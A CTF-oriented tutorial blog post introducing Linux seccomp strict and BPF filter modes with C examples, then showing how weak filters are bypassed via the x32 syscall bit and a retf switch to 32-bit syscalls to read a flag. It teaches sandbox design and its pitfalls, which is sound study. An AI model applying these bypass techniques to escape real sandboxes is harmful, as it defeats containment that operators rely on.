A Brief Introduction of Seccomp and How to Bypass it

Introduction

I have solve several seccomp related challenges in past few ctfs. To further enhance my understanding on seccomp, I decide to take a some time and learn how seccomm works.

All the codes used in this post can be download from here seccomp.zip

Seccomp

So whats is seccomp? "Seccomp is a computer secuirty facility in Linux kernel.[1]"

Basically, seccomp create a sandbox which limit user's ability to use syscalls. Using seccomp, we can create a environment that allow/disallow specific syscall being used.

The first version seccomp released at 2005. At that time, seccomp only have one node: strict mode. In this mode, users are only allowed to use four type of syscall read, write, exit and sigreturn. In strict mode, if user use any of syscall other than those four, the program will terminate immediately. (This is not very useful because there are too many limits!)

Then, in 2012, the second version of seccomp was introduced. Now seccomp have a new mode called filter mode. In this mode, user can specify syscalls that are allowed to run using BPF (Berkeley Packet Filter) virtual machine.

seccomp.h

1
2
3
4
/* Valid values for seccomp.mode and prctl(PR_SET_SECCOMP, <mode>) */
#define SECCOMP_MODE_DISABLED 0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */

Seccomp strict mode

Lets start with the basic mode of seccomp - strict mode.

To do that, we are going to ues a syscall called prctl.

more on prctl man page

1
2
3
#include <sys/prctl.h>
int prctl(int option, unsigned long arg2, unsigned long arg3,
unsigned long arg4, unsigned long arg5);

prctl is a syscall that allow you manipulate various aspects of the calling thread or process. There are lot of option we can use. In the case of of seccomp, we only need to focus on PR_GET_SECCOMP and PR_SET_SECCOMP

To get current seccomp mode, we can simply use prctl(PR_GET_SECCOMP)

To change current seccomp mode, we need to use prctl(PR_SET_SECCOMP,mode,arg1...)

Here is the example program using seccomp strict mode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// https://man7.org/linux/man-pages/man2/seccomp.2.html
#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <sys/syscall.h>
#include <unistd.h>

// demo of strict mode, only allow read(), write(), sigreturn()
int main() {
char msg[] = "hello world1!\n";
write(0,&msg,14);
printf("current mode %d, change to strict mode now...\n", prctl(PR_GET_SECCOMP));

// two way of using prctl
// prctl(PR_SET_SECCOMP,SECCOMP_MODE_STRICT);
syscall(__NR_prctl,PR_SET_SECCOMP,SECCOMP_MODE_STRICT);

// printf only use write, so it works
printf("seccomp change to mode strict\n");
// because prctl is a syscall. so no luck on that
printf("This line shouldn't appear; current mode %d\n", prctl(PR_GET_SECCOMP));
}

Output:

1
2
3
4
5
17:01:07 $ ./seccomp_strict 
hello world1!
current mode 0, change to strict mode now...
seccomp change to mode strict
Killed

As we can see, after we switch to strict mode, we can only use read, write, exit, sigreturn. If we try to use other syscall, such as prctl, the program would quit immediately.

Seccomp BPF (filter mode)

As we said, filter mode allow user use bpf filter and limit the usage of certain syscall. So before talking about seccomp, Lets talk about bpf first.

BPF was initially used in data link layer, allowing user to run code quickly inside kernel. So, user can manipulate witch data packets such filter data packet using bpf. Later bpf was also used in other places.

seccomp filter mode also use a bgf vritual machine for syscall filtering.

To do that, we need make a small program and load that program to kernel. Noted that loading process is invertible. So, once you loaded your bpf filter to the kernel, you will not able to modify or delete that.

a bpf program is defined by sock_fprog. In this struct, there is a len field showing the total number of instructions and a pointer to a list of instructions.

1
2
3
4
struct sock_fprog {	/* Required for SO_ATTACH_FILTER. */
unsigned short len; /* Number of filter blocks */
struct sock_filter __user *filter;
};

each instruction is defined by sock_filter. We can use different instruction code to perform different operation.

1
2
3
4
5
6
7
struct sock_filter {	/* Filter block */
__u16 code; /* Actual filter code */
__u8 jt; /* Jump true */
__u8 jf; /* Jump false */
__u32 k; /* Generic multiuse field */
};

sock_fprog and sock_filter are defined in filter.h. Detailed explanation be also be found in the header file.

bpf instruction include basic load, save, arithmetic op, jmp (condition/uncondition), and return.

all these instructions can be found in bpf_common.h.

When writing the bpf program, we can use two macro (BPF_STMT and BPF_JUMP to simplify our code.

filter.h

1
2
3
4
5
6
#ifndef BPF_STMT
#define BPF_STMT(code, k) { (unsigned short)(code), 0, 0, k }
#endif
#ifndef BPF_JUMP
#define BPF_JUMP(code, k, jt, jf) { (unsigned short)(code), jt, jf, k }
#endif

BPF_STMT is used for manipulate register and return value. It has two parameter. the first parameter is bpf instruction and second parameter is the value.

1
2
// find load nr (syscall number) to internal register
BPF_STMT(BPF_LD | BPF_W | BPF_ABS | BPF_K,(offsetof(struct seccomp_data, nr)))

BPF_LD means load value from seccomp_data, BPF_ABS means use absolute offset for data. BPF_K means load value to that internal register.

1
BPF_STMT(BPF_RET | BPF_K,SECCOMP_RET_KILL)

This just means return kill and end the process

BPF_JUMP is used for design control flow of our mini program. There are four arguments: instruction number, the value, jmp number if true, jump number is false

1
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K ,__NR_execve , 0, 2)

This statement means if value in the internal register is equal to __NR_execve, it will skip next jt=0 instruction (so doesn't do anything). if they are not equal, it will skip next jf=2 instructions.

After we create struct for seccomp, we can load our program to kernel using prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog).

One thing to mention is that we must set PR_SET_NO_NEW_PRIVS to 1, otherwise seccomp filter mode won't work prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);

Lets look at an example which trying to print out the flag for us.

seccomp_filter.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
// https://man7.org/linux/man-pages/man2/seccomp.2.html
#include <linux/seccomp.h> /* Definition of SECCOMP_* constants */
#include <linux/filter.h> /* Definition of struct sock_fprog */
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stddef.h>
#include <fcntl.h>

// demo of filter mode, not allow open
int main() {
char msg[] = "hello world1!\n";
write(0,&msg,14);
printf("current mode %d, change to filter mode now...\n", prctl(PR_GET_SECCOMP));

// must set to PR_SET_NO_NEW_PRIVS to 1, otherwise SECCOMP_MODE_FILTER will fail.
// https://man7.org/linux/man-pages/man2/seccomp.2.html
prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);

struct sock_filter filter[] = {
BPF_STMT(BPF_LD | BPF_W |BPF_ABS,(offsetof(struct seccomp_data, nr))), // get syscall number
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K,__NR_open,0,2), // if equal, continue (jump 0 instruction, jump to kill), else jump 2 instructions (jump to allow)
BPF_STMT(BPF_RET | BPF_K,SECCOMP_RET_KILL), // return kill
BPF_STMT(BPF_RET | BPF_K,SECCOMP_RET_TRACE), // return trace
BPF_STMT(BPF_RET | BPF_K,SECCOMP_RET_ALLOW), // return allow
};
//
struct sock_fprog prog = {
.len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
.filter = filter,
};

printf("set mode return %d\n",prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog));
printf("seccomp change to mode filter\n");

// open should not work
int fd = syscall(__NR_open,"flag.txt",O_RDONLY);

// rest of the program wont execute
char flag[23];
read(fd,&flag,23);
write(1,&flag,23);
}

Output:

1
2
3
4
5
hello world1!
current mode 0, change to filter mode now...
set mode return 0
seccomp change to mode filter
Bad system call

We can see seccomp successfully stop open syscall from executing!

We can also validate our seccomp filter using a tool call seccomp-tools

1
2
3
4
5
6
7
8
9
10
17:06:17 $ seccomp-tools dump ./seccomp_filter
hello world1!
current mode 0, change to filter mode now...
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000000 A = sys_number
0001: 0x15 0x00 0x02 0x00000002 if (A != open) goto 0004
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x06 0x00 0x00 0x7ff00000 return TRACE
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW

Common strategies in CTF

Now lets try to bypass our seccomp restriction.

Seccomp with no x32 ABI check

Here is our code from previous example. (see seccomp_filter_no_x32_abi_check.c)

img

Is there anyway we can bypass that? The answer is yes. Because we restricting x64 syscall, x32 syscalls are not limited!

We can still use x32 ABI syscalls

Therefore, if set x32 syscall flag bit for our syscall number, we can use our system call again!

We replace our syscall of open with __NR_open|__X32_SYSCALL_BIT.

seccomp_filter_no_x32_abi_check_bypass.c

1
2
3
4
5
6
// https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl
// only works for common syscalls
// using x32 ABI to bypass :)
// 0x2 | 0x40000000
int fd = syscall(__NR_open|__X32_SYSCALL_BIT,"flag.txt",O_RDONLY);
printf("why open works????????????????\n");

Execute our program again, we get the flag!

get_flag

Seccomp with no arch check

To prevent user from calling x32 ABI calls, we add another restriction. Check if syscall number is larger than 0x40000000

1
BPF_JUMP(BPF_JMP | BPF_JGE| BPF_K,__X32_SYSCALL_BIT,1,0),

seccomp_filter_no_arch_check.c
img

Output for seccomp

1
2
3
4
5
6
7
8
9
17:48:35 $ seccomp-tools dump ./seccomp_filter_no_arch_check
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000000 A = sys_number
0001: 0x35 0x01 0x00 0x40000000 if (A >= 0x40000000) goto 0003
0002: 0x15 0x00 0x02 0x00000002 if (A != open) goto 0005
0003: 0x06 0x00 0x00 0x00000000 return KILL
0004: 0x06 0x00 0x00 0x7ff00000 return TRACE
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW

Now, previous method wont work because if our syscall number is larger than 0x40000000, program will return Kill and stop executing.

But, in this example, our rule doesn't check syscall for i386 architecture. We can use retf and return to 32 bit. Then, we can use syscall from i386.

Here is the shellcode we can use to return to i386 code execution.

  1. xor return address with 0x2300000000 to return to 32 bit
  2. push return address to the stack
  3. use retf

get_flag_2

full exploit can be found in seccomp_filter_no_arch_check_bypass.c

Result

1
2
3
4
5
6
7
17:57:59 $ ./seccomp_filter_no_arch_check_bypass
hello world1!
current mode 0, change to filter mode now...
set mode return 0
seccomp change to mode filter
now you can't use open lol
flag{here_is_the_flag}

Other

TBD

Reference

  1. https://en.wikipedia.org/wiki/Seccomp
  2. https://xz.aliyun.com/t/11480
  3. https://n132.github.io/2022/07/04/S2.html
  4. https://tripoloski1337.github.io/ctf/2021/07/12/bypassing-seccomp-prctl.html
  5. http://blog.redrocket.club/2019/04/11/midnightsunctf-quals-2019-gissa2/